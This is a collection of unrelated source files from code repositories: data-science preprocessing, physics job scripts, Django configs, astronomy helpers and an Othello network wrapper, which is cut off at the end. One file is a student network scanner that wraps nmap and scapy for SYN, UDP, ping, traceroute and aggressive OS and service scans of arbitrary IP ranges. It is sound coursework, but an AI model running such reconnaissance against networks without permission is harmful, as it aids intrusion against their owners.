dataDicCount,_,_=load_pickle(dataPath+'dataTargetFeaAll_count')
#all 01 include location, notall01
dataDic_all01,dataDic_notall01,targetDic,allFeaList=load_pickle(dataPath+'dataTarget_FeaAll01_notall01')
dataDic_01_count={}
for idi,arr in dataDic_notall01.items()[:]:
count=np.array(dataDicCount[idi])
x=np.concatenate((count,arr))
dataDic_01_count[idi]=x;#print x.shape
save2pickle([dataDic_01_count,targetDic],'xy_dummy_Count')
"""
####see each xi ,at most how many event_type,
strFiDic={'event_type':0,'feature':0,'resource_type':0,'severity_type':0,'location':0}
#{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20}
dataDic,targetDic,allFeaList=load_pickle(dataPath+'dataTargetFeaAll_3')#{id:[strFea...]
for idi,strList in dataDic.items()[:]:#each xi
#print strList
for strFi_short,mostNum in strFiDic.items():
num=howMany(strFi_short,strList)
if num>mostNum:strFiDic[strFi_short]=num
print strFiDic
"""
####dataDic transform-> dataFrame
dataFrame={'id':[],'severity_type':[],'location':[],\
'event_type1':[],'event_type2':[],'event_type3':[],'event_type4':[],\
'event_type5':[],'event_type6':[],'event_type7':[],'event_type8':[],\
'event_type9':[],'event_type10':[],'event_type11':[],\
'resource_type1':[],'resource_type2':[],'resource_type3':[],'resource_type4':[],\
'resource_type5':[],\
'feature1':[],'feature2':[],'feature3':[],'feature4':[],'feature5':[],\
'feature6':[],'feature7':[],'feature8':[],'feature9':[],'feature10':[],\
'feature11':[],'feature12':[],'feature13':[],'feature14':[],'feature15':[],\
'feature16':[],'feature17':[],'feature18':[],'feature19':[],'feature20':[]}
"""
#split discrete variable 'bc'
print('Clearing...')
# v22 v56 v125 'bcn'remain,add more variable,err not decrease
train['v22_0']=train.v22.str[0];
train['v22_1']=train.v22.str[1];
train['v22_2']=train.v22.str[2];
train['v22_3']=train.v22.str[3];
train['v56_0']=train.v56.str[0];
train['v56_1']=train.v56.str[1];
train['v125_0']=train.v125.str[0];
train['v125_1']=train.v125.str[1];
train['v113_0']=train.v113.str[0]
train['v113_1']=train.v113.str[1]
strList=['v22','v56','125','113']
newfea=[]
for strI in strList:
for col in train.columns:
if col.find(strI+'_')!=-1:
print col
serial=train[col].values
print np.unique(serial).shape
print np.unique(serial)[:50]
#
s, tmp_indexer = pd.factorize(train[col])
print s.shape
newfea.append(s)
newfea=np.array(newfea).T#[d,n] ->[n,d]
print newfea.shape#[n,10]
save2pickle(newfea,'splitFea')
#pad v22
#train=pad(train)
#
"""
"""
#dropna not factorized,see complete dataset without nan
train1=train.dropna(axis=1,how='any')#12 fea with all value
train2=train.dropna(axis=0,how='any');print 'complete data',train2.values.shape #complete fea data
test2=test.dropna(axis=0,how='any')
train2test2=np.concatenate((train2.values,test2.values),axis=0);print train2test2.shape#not factorized
print 'all value fea',train1.columns
test1=test[train1.columns]
#train=train1;test=test1
#
# fill na ,factorize str feature
missFea=[];completeFea=[]
feaInd=-1
for (train_name, train_series), (test_name, test_series) in zip(train.iteritems(),test.iteritems())[:]:
feaInd+=1
# each columns,fea
valuePercnt_train=train[train_name].count()/float(train.values.shape[0])
valuePercnt_test=test[test_name].count()/float(test.values.shape[0])
#print 'non-nan value fea',train_name,train_series.dtype,valuePercnt_train,valuePercnt_test
##
if train_series.dtype == 'O':
#for objects: factorize
train[train_name], tmp_indexer = pd.factorize(train[train_name]);
#print np.unique(tmp_indexer).shape
test[test_name] = tmp_indexer.get_indexer(test[test_name])
if valuePercnt_test+valuePercnt_train<2.:missFea.append(feaInd)
else:completeFea.append(feaInd)
#but now we have -1 values (NaN)
else:
#print train_name,np.unique(train_series).shape
#for int or float: fill NaN with mean
if valuePercnt_test+valuePercnt_train<2.:
missFea.append(feaInd)
tmp_len = len(train[train_series.isnull()]);
if tmp_len>0:
train.loc[train_series.isnull(), train_name] = -1000
#and Test
tmp_len = len(test[test_series.isnull()])
if tmp_len>0:
test.loc[test_series.isnull(), test_name] = -1000
else:
completeFea.append(feaInd)
tmp_len = len(train[train_series.isnull()]);
if tmp_len>0:
train.loc[train_series.isnull(), train_name] = train_series.mean()
#and Test
tmp_len = len(test[test_series.isnull()])
if tmp_len>0:
test.loc[test_series.isnull(), test_name] = train_series.mean() #TODO
"""
"""
print len(missFea),len(completeFea)
##
missInd=list(np.where(train.values==-1)[0])+list(np.where(train.values==-1000)[0])
train1=train.drop(missInd,axis=0,inplace=False)
missInd=list(np.where(test.values==-1)[0])+list(np.where(test.values==-1000)[0])
test1=test.drop(missInd,axis=0,inplace=False)
train2test2=np.concatenate((train1,test1),axis=0);print 'complete data',train2test2.shape
save2pickle([missFea,completeFea,train.values,test.values,train2test2],'midData')
"""
"""
#####################
#xgboost
###################
# convert data to xgb data structure
missing_indicator=-1000
xgtrain = xgb.DMatrix(train.values, target.values,missing=missing_indicator);
#xgtest = xgb.DMatrix(test,missing=missing_indicator)
# train model
print('Fit different model...')
for boost_round in [50,100][:1]:
for maxDepth in [7,14][:1]:#7 14
xgboost_params = get_params(maxDepth)
# train model
#clf = xgb.train(xgboost_params,xgtrain,num_boost_round=boost_round,verbose_eval=True,maximize=False)
clf=xgb.train(xgboost_params,xgtrain,num_boost_round=boost_round)
# train error
train_preds = clf.predict(xgtrain, ntree_limit=clf.best_iteration)
print maxDepth,boost_round
print('Train err is:', eval_wrapper(train_preds, target.values))# 50 7 0.19
"""
"""
#test predict
print('Predict...')
test_preds = clf.predict(xgtest, ntree_limit=clf.best_iteration)
# Save results
#
preds_out = pd.DataFrame({"ID": ids, "PredictedProb": test_preds})
preds_out.to_csv("../acc_process_submission.csv")
#
"""
"""
{id:{event:[11 events at most for one xi] in order---------------53 kinds
feature:[20] -----------------386
resource:[5]------------------10
severity:[1]------------------------5
location:[1]-------------------------------929+1039
volume:[20]------------------------341
"""
| [
"2877992943@qq.com"
] | 2877992943@qq.com | |
bc0931805ad7e9284f0119c1ac19292c92649d57 | 3624e9f0a026b57ebdafa4e842b93f56e5a8504d | /Codeforces/CodeCraft 2015/Problem H/gen2.py | 46250d91b25f885c1db8bb12d779c6009c0ba217 | [
"MIT"
] | permissive | ailyanlu1/Competitive-Programming-2 | 54109c8644d3ac02715dc4570916b212412c25c0 | 6c990656178fb0cd33354cbe5508164207012f24 | refs/heads/master | 2020-03-23T07:48:20.560283 | 2018-02-15T06:49:49 | 2018-02-15T06:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | print 10**5,2
n = 10**5
for i in xrange(n):
print n-i,
| [
"adityapaliwal95@gmail.com"
] | adityapaliwal95@gmail.com |
464ebf186e3319a72253e12fa4a37890c21aa4a0 | 06a2dab18197a13fc3371debd29b476ae99cb01c | /T3/inputs/dnn2017.py | 3c0661637347e70ff855197b207c33c81ac06421 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | PandaPhysics/PandaAnalysis | 397a031f9e8d399be1814ab04dd525d69b41f060 | 3167d106d41dfce58219c3e07d30e201ee823b55 | refs/heads/master | 2021-06-18T13:52:57.650900 | 2019-04-08T17:35:29 | 2019-04-08T17:35:29 | 168,376,672 | 0 | 0 | NOASSERTION | 2019-04-08T17:33:55 | 2019-01-30T16:34:09 | C++ | UTF-8 | Python | false | false | 2,252 | py | #!/usr/bin/env python
from re import sub
from sys import argv,exit
from os import system,getenv,path
from time import clock,time
import json
which = int(argv[1])
submit_id = int(argv[2])
sname = argv[0]
argv=[]
import ROOT as root
from PandaCore.Tools.Misc import *
from PandaCore.Utils.load import *
import PandaCore.Tools.job_config as cb
import PandaAnalysis.Tagging.cfg_v8 as tagcfg
import PandaAnalysis.T3.job_utilities as utils
from PandaAnalysis.Flat.analysis import wlnhbb2017, breg
Load('PandaAnalyzer')
data_dir = getenv('CMSSW_BASE') + '/src/PandaAnalysis/data/'
def fn(input_name, isData, full_path):
logger.info(sname+'.fn','Starting to process '+input_name)
# now we instantiate and configure the analyzer
a = breg(True)
a.bjetBDTReg = True
a.bjetDeepReg = True
a.inpath = input_name
a.outpath = utils.input_to_output(input_name)
a.datapath = data_dir
a.isData = isData
utils.set_year(a, 2017)
a.processType = utils.classify_sample(full_path, isData)
if a.processType in {root.pa.kTT, root.pa.kH}:
a.reclusterGen = True # only turn on if necessary
skimmer = root.pa.PandaAnalyzer(a)
return utils.run_PandaAnalyzer(skimmer, isData, a.outpath)
if __name__ == "__main__":
sample_list = cb.read_sample_config('local.cfg',as_dict=False)
to_run = None #sample_list[which]
for s in sample_list:
if which==s.get_id():
to_run = s
break
if not to_run:
logger.error(sname,'Could not find a job for PROCID=%i'%(which))
exit(3)
outdir = getenv('SUBMIT_OUTDIR')
lockdir = getenv('SUBMIT_LOCKDIR')
outfilename = to_run.name+'_%i.root'%(submit_id)
processed = {}
utils.report_start(outdir,outfilename,to_run.files)
wd = utils.isolate()
utils.main(to_run, processed, fn)
utils.hadd(processed.keys())
utils.print_time('hadd')
ret = utils.stageout(outdir,outfilename)
utils.cleanup('*.root')
utils.un_isolate(wd)
utils.print_time('stageout and cleanup')
if not ret:
utils.report_done(lockdir,outfilename,processed)
utils.cleanup('*.lock')
utils.print_time('create lock')
else:
exit(-1*ret)
exit(0)
| [
"sidn@mit.edu"
] | sidn@mit.edu |
adc11ab3efac0ad1c5eeda997c8b80112d687ef1 | 5600396adac44f47acea8450431ff5a2bd010335 | /tests/asgi.py | 2362e20b7ae57051fb01efdad0f0cbbe91cd5526 | [
"Apache-2.0"
] | permissive | grantjenks/django-dblog | 83ee2aea496f46983a6850bca4b5a43e6abf2578 | c064b8018b4221ee7d6260cf6430b7cfa8dccee8 | refs/heads/main | 2023-08-27T23:03:22.351497 | 2022-03-12T21:25:37 | 2022-03-12T21:25:37 | 165,946,756 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
ASGI config for tests project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
application = get_asgi_application()
| [
"grant.jenks@gmail.com"
] | grant.jenks@gmail.com |
b1a5bd0d239833c755f17fd0956b32582769f29b | 08230e7d79e34930a309962e15e9a30323529b52 | /Unconfirmed 440008.crdownload | 17a2b917348cc68b7d866651dfb1babcdeda1a63 | [] | no_license | nathanmeagher/PH30116 | ede5d61012e8708c35db44f08ec92560cc1506b3 | 5fb33a7ad8f3fb47cacd8dbbee7e1a96ed2a5bee | refs/heads/master | 2020-08-10T23:25:38.341909 | 2019-12-19T15:54:25 | 2019-12-19T15:54:25 | 214,443,085 | 1 | 0 | null | 2019-10-11T13:26:58 | 2019-10-11T13:26:58 | null | UTF-8 | Python | false | false | 3,840 | crdownload | #!/usr/bin/env python
"""
Reading in and manipulating fits files
"""
import numpy as np
import pandas as pd
from scipy import optimize
from scipy.interpolate import interpn
def read_exopars(dataframe,par1='a',par2='Mstar',meth='RV'):
M_earth = 5.97
M_jupiter = 1898
method = dataframe[:,1]
filter = 'Radial Velocity'
# Return only data acquired with input method
if meth == 'RV':
filter = 'Radial Velocity'
elif meth == 'Transit':
filter = 'Transit'
elif meth == 'PT':
filter = 'Pulsar Timing'
elif meth == 'ML':
filter = 'Microlensing'
elif meth == 'Im':
filter = 'Imaging'
# Read in data from input dataframe, using filter on method
a = pd.to_numeric(dataframe[:,7][method==filter])
a_perr = pd.to_numeric(dataframe[:,8][method==filter])
a_nerr = pd.to_numeric(dataframe[:,9][method==filter])
a_err = [-1*a_nerr,a_perr]
Mstar = pd.to_numeric(dataframe[:,19][method==filter]) * (M_jupiter/M_earth)
Mstar_perr = pd.to_numeric(dataframe[:,20][method==filter]) * (M_jupiter/M_earth)
Mstar_nerr = pd.to_numeric(dataframe[:,21][method==filter]) * (M_jupiter/M_earth)
Mstar_err = [-1*Mstar_nerr,Mstar_perr]
return a,a_err,Mstar,Mstar_err
def linfit(xdata, ydata, yerr=None, pinit=[1.0,-1.0]):
#logx = np.log10(xdata)
#logy = np.log10(ydata)
#logyerr = yerr/ydata
pinit=[5.8,0.3]
yerr = np.full(len(xdata),0.1)
# Define function for calculating a power law
linfit = lambda p, x: p[0] + p[1] * x
linerr = lambda p, x, y, err: (y-linfit(p,x))/err
# Fit data with function defined above
out = optimize.leastsq(linerr,pinit,args=(xdata,ydata,yerr[0]), full_output=1)
# Determine best-fit parameters and associated errors
pfinal = out[0]
covar = out[1]
index = pfinal[1]
intercep = pfinal[0]
indexErr = np.sqrt( covar[1][1] )
intercepErr = np.sqrt( covar[0][0] )
return index,indexErr,intercep,intercepErr
def Zrecal(R23_met):
a = 664.8453
b=-225.7533
c=25.76888
d=-0.9761368
O3N2_met = a + (b*x) + (c * x**2) + (d * x**3)
return O3N2_met
def conflevels(x,y,nbins,confints=[0.99,0.95,0.68]):
# Make a 2d normed histogram
H,xedges,yedges=np.histogram2d(x,y,bins=nbins,normed=True)
norm=H.sum() # Find the norm of the sum
# Set contour levels
contour1=0.99
contour2=0.95
contour3=0.68
# Set target levels as percentage of norm
target1 = norm*contour1
target2 = norm*contour2
target3 = norm*contour3
# Take histogram bin membership as proportional to Likelihood
# This is true when data comes from a Markovian process
def objective(limit, target):
w = np.where(H>limit)
count = H[w]
return count.sum() - target
# Find levels by summing histogram to objective
level1= optimize.bisect(objective, H.min(), H.max(), args=(target1,))
level2= optimize.bisect(objective, H.min(), H.max(), args=(target2,))
level3= optimize.bisect(objective, H.min(), H.max(), args=(target3,))
# For nice contour shading with seaborn, define top level
level4=H.max()
levels=[level1,level2,level3,level4]
return levels
def density_scatter(x , y, ax=None, sort=True, bins=20,):
"""
Scatter plot colored by 2d histogram
"""
#if ax is None :
# fig , ax = plt.subplots()
data , x_e, y_e = np.histogram2d( x, y, bins = bins)
z = interpn( ( 0.5*(x_e[1:] + x_e[:-1]) , 0.5*(y_e[1:]+y_e[:-1]) ) , data , np.vstack([x,y]).T , method = "splinef2d", bounds_error = False )
# Sort the points by density, so that the densest points are plotted last
if sort :
idx = z.argsort()
x, y, z = x[idx], y[idx], z[idx]
#ax.scatter( x, y, c=z, **kwargs )
return z
| [
"nathanm3m@gmail.com"
] | nathanm3m@gmail.com |
314fe3ea19cb86cb5f90d1f8c202393b1bd22ebe | 264d1409febf9d58258c397e8586551776e513e5 | /Scanner.py | 44992aae24ed157010ae0a61f07c47d6b577d41d | [] | no_license | ParkerFrame/Scripts | 9a0fa9a07ac6b893777c023761d6d855d033c328 | 4fd5ac32c53bb7cdd2368020187d468fd64eedab | refs/heads/master | 2020-12-31T22:27:23.264642 | 2020-02-08T02:02:59 | 2020-02-08T02:02:59 | 239,054,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,747 | py | #!/usr/bin/python3
"""
Name: Parker Frame
Date: 2/7/2020
Description: This tool is used for some basic level scanning bu utlizing scapy and nmap python libraries. """
#imported the nmap library
import nmap
import time
from scapy.all import *
import fpdf
#store scanner tool, nmap version, tgt
scanner = nmap.PortScanner()
nmapVer = scanner.nmap_version()
#prep the pdf formation
pdf = fpdf.FPDF(format='letter')
pdf.add_page()
pdf.set_font("Arial", size=10)
print("Welcome to the best scanner on this side of the Mississippi! Please use this tool wisely and ethically or else Professor Miller will be upset.")
print('\n')
print("<--------------------------------------------------------->")
time.sleep(1)
print('\n')
#options for the user to choose from
userResponse = input("""\nPlease enter the type of scan you want to run: (All options except #4 can save results to PDF!)
1)SYN/ACK Scan (TCP)
2)UDP Scan
3)Ping Scan (ICMP)
4)Tracerroute
5)Comprehensive Scan (OS, Service, etc.) \n\n Choose from the above options (1-5) and press enter: """)
print("You have selected option: ", userResponse, " \n")
#start with tracerroute because its the simplest
if userResponse == '4':
from scapy.all import *
hostname = input("What domain or IP do you want to trace? (Ex. www.google.com, 192.168.1.153, etc.): ")
print("This might take a bit so just sit back and relax while we trace the route!")
print("If the trace gets stuck for too long then press Ctrl+C to end the trace.")
print("<--------------------------------------------------------->")
for i in range(1, 28):
pkt = IP(dst=hostname, ttl=i) / UDP(dport=33434)
# Send the packet and get a reply
reply = sr1(pkt, verbose=0)
if reply is None:
# No reply =(
break
elif reply.type == 3:
# We've reached our destination
print("Done!", reply.src)
break
else:
# We're in the middle somewhere
print("%d hops away: " % i , reply.src)
else:
ipAddr = input("Enter the target IP address you want to scan (Ex. 192.168.1.1, 192.168.1.0/24, 192.168.1-30.230-250, etc.): ")
print("The IP address you entered is: ", ipAddr)
type(ipAddr)
print('\n')
tgtPorts = input("Enter the port range you want to scan, if applicable (Ex. 22, 80-95, 1-1000, etc.): ")
print("The port range you entered is: ", tgtPorts)
type(tgtPorts)
print("This might take a bit so just sit back and relax while we scan away!")
print("<--------------------------------------------------------->")
#the other options are here
if userResponse == '1':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sS')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
#store data for pdf creation
pdfData = scanner.csv()
time.sleep(2)
# print(pdfData)
elif userResponse == '2':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sU')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['udp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse == '3':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -PE')
# print(scanner.scaninfo())
# print(scanner.csv())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse == '5':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sS -sV -sC -A -O')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse >= '6':
print("Please enter a valid option")
time.sleep(2)
print("<--------------------------------------------------------->")
print("Your scan is complete!")
pdfInput = input("\nDo you want to store the csv of your results in a python-generated pdf? It's prettty coool....""""
1) Yes, I am awesome and I want to do that!
2) No, I don't want to do that cool thing. \n\n Choose from the above options and press enter: """)
#loop through data and generate pdf
if pdfInput == '1':
for i in pdfData:
pdf.write(5,str(i))
pdf.output("scanResults.pdf")
elif pdfInput == '2':
print("You missed out man...I'm sorry") | [
"noreply@github.com"
] | noreply@github.com |
c23ddb3931f40fcabc701c9e3b5cb986269f8faa | 95e057a729db6480e6769d5aa0bfa0775fa35b9f | /run.py | ced8e2b08a1271848924c9a7dc7e4762b260a688 | [
"BSD-2-Clause"
] | permissive | jinbow/swotsimulator | 755594716a5c5f8619f22f1bd2640dc08500aa80 | 20a3330ee8b0c64ccd26818163fb9adc75b1e37e | refs/heads/master | 2020-12-25T02:40:20.763294 | 2016-06-22T14:53:31 | 2016-06-22T14:53:31 | 62,241,313 | 0 | 1 | null | 2016-06-29T16:30:59 | 2016-06-29T16:30:59 | null | UTF-8 | Python | false | false | 563 | py | import sys, os
import shutil
if (len(sys.argv) < 2):
file_param=os.getcwd()+os.sep+'example'+os.sep+'params_example.txt'
print("no params file specified, default is " +file_param)
else:
file_param=str(sys.argv[1])
if os.path.isfile(file_param):
# basedir=os.path.dirname(swotsimulator.__file__)
shutil.copyfile(file_param, 'params.py') #os.path.join(basedir,'params.py'))
else:
print("Error: No such file: '%s'" % file_param)
sys.exit()
import swotsimulator.run_simulator as run_simulator
run_simulator.run_simulator(file_param)
| [
"Jinbo.Wang@jpl.nasa.gov"
] | Jinbo.Wang@jpl.nasa.gov |
1fa3f2cd18faf6841eb0271edd0c907f0dd886a9 | 11015fa254cf01b7f1958885f09e978d14ed2b6f | /pages/tests/documents/urls.py | 993b8117a8dc5617b2478c5f9836b44e31ee431c | [
"BSD-3-Clause"
] | permissive | af/django-page-cms | f68ac0f818a8a7040e5f02fc6c3211e44ad6e77a | 0f1ac577e8d2cc86f14ea08c24128220f1a6b534 | refs/heads/master | 2021-01-16T01:02:42.940361 | 2010-03-16T12:13:52 | 2010-03-16T12:13:52 | 565,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | from django.conf.urls.defaults import *
from django.conf import settings
from pages.tests.documents.views import document_view
from pages.http import pages_view
urlpatterns = patterns('',
url(r'(?P<document_id>[0-9]+)$', pages_view(document_view), name='document_details'),
url(r'$', pages_view(document_view), name='document_root'),
) | [
"batisteb@opera.com"
] | batisteb@opera.com |
07be2c5f5083ce7d52cb8a81a163a27b1d3f0f02 | fed53a83f014dedd79258ea16c2ec0ffffb522a6 | /src/restfw/tests/test_add_sub_resource_fabric.py | 7c1cb27ebc106b175a04a152e7e5f90f9b8031c2 | [
"MIT"
] | permissive | Cykooz/restfw | a995813c9d4bbd20aa3079ab8192c3d2ba2410d0 | 91951f5e095eaac4ec66ae1d7fe95cc5f6e773d5 | refs/heads/master | 2023-01-23T11:30:11.769448 | 2023-01-10T07:32:15 | 2023-01-10T07:32:15 | 114,084,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,879 | py | # -*- coding: utf-8 -*-
"""
:Authors: cykooz
:Date: 23.11.2018
"""
import pytest
from cykooz.testing import D
from pyramid.traversal import find_interface
from ..hal import HalResource, SimpleContainer
from ..views import HalResourceWithEmbeddedView, list_to_embedded_resources, resource_view_config
class DummyApiVersion(SimpleContainer):
pass
class DummyMinApiVersion:
"""Testing predicate for sub resource fabric"""
def __init__(self, val, config):
self.val = val
def text(self):
return 'min_api_version = %s' % (self.val,)
phash = text
def __call__(self, parent):
api_version = find_interface(parent, DummyApiVersion)
if not api_version:
return False
version = int(api_version.__name__)
return version >= self.val
class DummyMaxApiVersion:
"""Testing predicate for sub resource fabric"""
def __init__(self, val, config):
self.val = val
def text(self):
return 'max_api_version = %s' % (self.val,)
phash = text
def __call__(self, parent):
api_version = find_interface(parent, DummyApiVersion)
if not api_version:
return False
version = int(api_version.__name__)
return version <= self.val
class DummyResource(HalResource):
pass
class SubDummyResource(HalResource):
def __init__(self, parent):
pass
class Sub1DummyResource(HalResource):
def __init__(self, parent):
pass
class Sub2DummyResource(HalResource):
def __init__(self, parent):
pass
class Sub23DummyResource(HalResource):
def __init__(self, parent):
pass
class Container(SimpleContainer):
pass
@resource_view_config(Container)
class ContainerView(HalResourceWithEmbeddedView):
def get_embedded(self, params: dict):
return list_to_embedded_resources(
self.request, params,
resources=list(self.resource.values()),
parent=self.resource,
embedded_name='items'
)
@pytest.fixture(name='root')
def root_fixture(app_config, pyramid_request):
root = pyramid_request.root
root['container'] = Container()
root['container']['resource'] = DummyResource()
for i in range(4):
root[str(i)] = DummyApiVersion()
root[str(i)]['resource'] = DummyResource()
app_config.add_sub_resource_fabric_predicate('min_api_version', DummyMinApiVersion)
app_config.add_sub_resource_fabric_predicate('max_api_version', DummyMaxApiVersion)
app_config.add_sub_resource_fabric(SubDummyResource, 'sub', DummyResource)
app_config.add_sub_resource_fabric(
SubDummyResource, 'static_sub', DummyResource,
add_link_into_embedded=True
)
app_config.add_sub_resource_fabric(
Sub1DummyResource, 'sub1', DummyResource, min_api_version=1
)
app_config.add_sub_resource_fabric(
Sub2DummyResource, 'sub2', DummyResource, max_api_version=2
)
app_config.add_sub_resource_fabric(
Sub23DummyResource, 'sub23', DummyResource,
add_link_into_embedded=True,
min_api_version=2, max_api_version=3,
)
app_config.scan('restfw.tests.test_add_sub_resource_fabric')
app_config.commit()
return root
def test_add_sub_resource_fabric_directive(root):
sub = root['container']['resource']['sub']
assert isinstance(sub, SubDummyResource)
assert sub.__parent__ is root['container']['resource']
assert sub.__name__ == 'sub'
with pytest.raises(KeyError):
_ = root['0']['resource']['sub1']
for v in [1, 2, 3]:
sub1 = root[str(v)]['resource']['sub1']
assert isinstance(sub1, Sub1DummyResource)
with pytest.raises(KeyError):
_ = root['3']['resource']['sub2']
for v in [0, 1, 2]:
sub2 = root[str(v)]['resource']['sub2']
assert isinstance(sub2, Sub2DummyResource)
for v in [0, 1]:
with pytest.raises(KeyError):
_ = root[str(v)]['resource']['sub23']
for v in [2, 3]:
sub23 = root[str(v)]['resource']['sub23']
assert isinstance(sub23, Sub23DummyResource)
def test_links_to_sub_resource(web_app, root, app_config):
# Get self resource
res = web_app.get('container/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/container/resource/'},
'sub': {'href': 'http://localhost/container/resource/sub/'},
'static_sub': {'href': 'http://localhost/container/resource/static_sub/'},
}
}
# Get resource as embedded
res = web_app.get('container')
assert res.json_body == D({
'_embedded': {
'items': [
{
'_links': {
'self': {'href': 'http://localhost/container/resource/'},
# Only static link to sub-resource has added
'static_sub': {'href': 'http://localhost/container/resource/static_sub/'},
},
}
]
}
})
# Get different api versions
res = web_app.get('0/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/0/resource/'},
'sub': {'href': 'http://localhost/0/resource/sub/'},
'sub2': {'href': 'http://localhost/0/resource/sub2/'},
'static_sub': {'href': 'http://localhost/0/resource/static_sub/'},
}
}
res = web_app.get('1/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/1/resource/'},
'sub': {'href': 'http://localhost/1/resource/sub/'},
'sub1': {'href': 'http://localhost/1/resource/sub1/'},
'sub2': {'href': 'http://localhost/1/resource/sub2/'},
'static_sub': {'href': 'http://localhost/1/resource/static_sub/'},
}
}
res = web_app.get('2/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/2/resource/'},
'sub': {'href': 'http://localhost/2/resource/sub/'},
'sub1': {'href': 'http://localhost/2/resource/sub1/'},
'sub2': {'href': 'http://localhost/2/resource/sub2/'},
'sub23': {'href': 'http://localhost/2/resource/sub23/'},
'static_sub': {'href': 'http://localhost/2/resource/static_sub/'},
}
}
res = web_app.get('3/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/3/resource/'},
'sub': {'href': 'http://localhost/3/resource/sub/'},
'sub1': {'href': 'http://localhost/3/resource/sub1/'},
'sub23': {'href': 'http://localhost/3/resource/sub23/'},
'static_sub': {'href': 'http://localhost/3/resource/static_sub/'},
}
}
| [
"cykooz@gmail.com"
] | cykooz@gmail.com |
c490e3371dd1c651b02fc45c853857c8af37dff3 | b8bd1ad15a48ad88b1b7c2bff870bf5dc1441b66 | /train/network/QNetWrapper.py | 3060adb16b18a36d9f0cfe0fb2da5542389b35b8 | [] | no_license | Jung-JongHyuk/othelloAI | a718f7a6a9cb92b4a26db16e0ec8aec36c6f88c3 | 8918f4cdb9a3bf5efc9887200a12f4d3e3c4d9ab | refs/heads/master | 2023-07-28T14:15:48.633038 | 2021-09-20T07:38:39 | 2021-09-20T07:38:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,315 | py | import torch
import torch.optim as optim
import numpy as np
import time
import sys
import os
from tqdm import tqdm
from .NeuralNet import NeuralNet
from .QVGGNet import QVGGNet
from .QFCNNet import QFCNNet
from .quantizedLayer import Linear_Q, Conv2d_Q
sys.path.append('../')
from train.utils import *
args = dotdict({
'lr': 0.001,
'dropout': 0.3,
'epochs': 10,
'batch_size': 64,
'cuda': torch.cuda.is_available(),
'num_channels': 512,
})
class QNetWrapper(NeuralNet):
def __init__(self, game):
self.nnet = QFCNNet(game, args)
self.boardSize = game.getBoardSize()
self.actionSize = game.getActionSize()
if args.cuda:
self.nnet.cuda()
def train(self, examples):
"""
examples: list of examples, each example is of form (board, pi, v)
"""
optimizer = optim.Adam(self.nnet.parameters())
for epoch in range(args.epochs):
print('EPOCH ::: ' + str(epoch + 1))
self.nnet.train()
pi_losses = AverageMeter()
v_losses = AverageMeter()
batch_count = int(len(examples) / args.batch_size)
t = tqdm(range(batch_count), desc='Training Net')
for _ in t:
sample_ids = np.random.randint(len(examples), size=args.batch_size)
boards, pis, vs = list(zip(*[examples[i] for i in sample_ids]))
